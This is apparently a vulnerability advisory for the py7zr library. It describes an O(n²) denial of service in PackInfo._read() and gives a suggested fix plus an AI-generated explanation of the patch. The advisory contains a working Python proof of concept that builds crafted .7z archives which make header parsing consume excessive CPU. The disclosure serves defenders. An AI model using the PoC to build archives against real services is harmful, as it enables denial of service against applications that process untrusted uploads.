py7zr: O(n^2) algorithmic complexity DoS in PackInfo._read()
Description
Summary
PackInfo._read() uses an O(n^2) cumulative sum pattern where numstreams is read directly from the archive header. A crafted .7z archive with a large numstreams value causes excessive CPU consumption during SevenZipFile.__init__() — no extraction is needed. A 50 KB archive takes ~7 seconds of CPU time.
Details
The vulnerable code is in PackInfo._read() (archiveinfo.py):
self.packpositions = [sum(self.packsizes[:i]) for i in range(self.numstreams + 1)]
numstreams is parsed from the archive header via read_uint64() and is attacker-controlled. Each sum(self.packsizes[:i]) re-sums from the beginning, producing O(n^2) total work. This runs during header parsing in SevenZipFile.__init__(), before any extraction.
Suggested fix — replace with O(n) cumulative sum:
from itertools import accumulate self.packpositions = [0] + list(accumulate(self.packsizes))
PoC
import py7zr
from py7zr.archiveinfo import write_uint64, PROPERTY
MAGIC = b'\x37\x7a\xbc\xaf\x27\x1c'
def encode_uint64(v):
buf = io.BytesIO()
write_uint64(buf, v)
return buf.getvalue()
def build_7z_with_streams(numstreams):
header = io.BytesIO()
header.write(PROPERTY.HEADER)
header.write(PROPERTY.MAIN_STREAMS_INFO)
header.write(PROPERTY.PACK_INFO)
header.write(encode_uint64(0))
header.write(encode_uint64(numstreams))
header.write(PROPERTY.SIZE)
for _ in range(numstreams):
header.write(encode_uint64(1))
header.write(PROPERTY.END)
header.write(PROPERTY.END)
header.write(PROPERTY.END)
header_data = header.getvalue()
out = io.BytesIO()
out.write(MAGIC)
out.write(b'\x00\x04')
next_crc = binascii.crc32(header_data) & 0xFFFFFFFF
start_header = (struct.pack('<Q', 0)
+ struct.pack('<Q', len(header_data))
+ struct.pack('<I', next_crc))
out.write(struct.pack('<I', binascii.crc32(start_header) &
0xFFFFFFFF))
out.write(start_header)
out.write(header_data)
return out.getvalue()
for n in [1000, 5000, 10000, 30000, 50000]:
archive = build_7z_with_streams(n)
start = time.time()
try:
with py7zr.SevenZipFile(io.BytesIO(archive), 'r') as z:
pass
except Exception:
# The crafted archive may later raise due to being malformed,
# but the quadratic work has already been performed during
# header parsing in SevenZipFile.__init__().
pass
elapsed = time.time() - start
print(f"n={n:6d} size={len(archive):8d} bytes
time={elapsed:.3f}s")
Tested on py7zr 1.1.0, Python 3.12.3, Linux x86_64.
Results:
n= 1000 size= 1042 bytes time=0.004s n= 5000 size= 5042 bytes time=0.071s n= 10000 size= 10042 bytes time=0.291s n= 30000 size= 30043 bytes time=2.609s n= 50000 size= 50043 bytes time=7.097s
Impact
Denial of Service. Any application that opens .7z archives from untrusted sources using py7zr.SevenZipFile() can be caused to consume excessive CPU time with a small crafted archive. The quadratic cost occurs during header parsing, before any content extraction.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1Patches
Vulnerability mechanics
Root cause
"Missing input validation on `numstreams` combined with an O(n²) cumulative sum computation in `PackInfo._read()` allows an attacker to cause excessive CPU consumption via a crafted archive header."
Attack vector
An attacker crafts a small .7z archive with a large `numstreams` value in the PackInfo header. When a victim application opens the archive via `py7zr.SevenZipFile()`, the quadratic `packpositions` computation consumes excessive CPU time — a 50 KB archive causes ~7 seconds of CPU usage [ref_id=1]. No extraction is required; the cost is incurred during header parsing alone.
Affected code
The vulnerability is in `PackInfo._read()` in `py7zr/archiveinfo.py`. The line `self.packpositions = [sum(self.packsizes[:i]) for i in range(self.numstreams + 1)]` recomputes the cumulative sum from scratch for each index, producing O(n²) work. This runs during `SevenZipFile.__init__()` header parsing, before any extraction.
What the fix does
The patch [patch_id=6634785] makes two changes. First, it adds a `MAX_NUMSTREAMS = 65536` constant and a validation check that raises `Bad7zFile` if `numstreams` exceeds this limit, preventing the attacker from specifying arbitrarily large values. Second, it replaces the O(n²) list comprehension with `list(accumulate(self.packsizes, initial=0))`, which computes the cumulative sum in O(n) time using `itertools.accumulate`.
Preconditions
- inputThe victim must open a crafted .7z archive using py7zr.SevenZipFile()
- authNo authentication or special privileges required; the archive can be supplied by any untrusted source
Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3News mentions
0No linked articles in our index yet.